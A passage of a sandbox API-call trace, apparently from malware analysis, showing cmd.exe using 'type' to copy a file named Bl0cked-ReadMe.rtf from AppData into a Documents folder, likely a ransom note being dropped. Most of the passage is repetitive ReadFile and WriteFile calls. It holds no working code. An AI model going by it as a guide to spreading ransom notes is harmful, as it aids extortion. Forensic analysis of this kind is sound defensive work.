lpMode=0x22f898) returned 1 [0235.388] _dup (_FileHandle=1) returned 3 [0235.388] _close (_FileHandle=1) returned 0 [0235.388] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0235.388] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f868, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0235.389] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0235.389] GetConsoleTitleW (in: lpConsoleTitle=0x22f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.389] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0235.389] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0235.389] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0235.389] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0235.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.390] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f1fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f1fc) returned 0x410e90 [0235.390] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0235.390] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0235.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0235.390] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e108, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0235.390] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] GetFileType (hFile=0x54) returned 0x1 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e160 | out: lpFileSizeHigh=0x22e160*=0x0) returned 0x1632 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.391] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.391] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] GetFileType (hFile=0x4c) returned 0x1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] GetFileType (hFile=0x4c) returned 0x1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.393] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.393] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.394] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.394] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.395] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.395] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.396] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.396] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.397] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.397] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.398] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.399] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 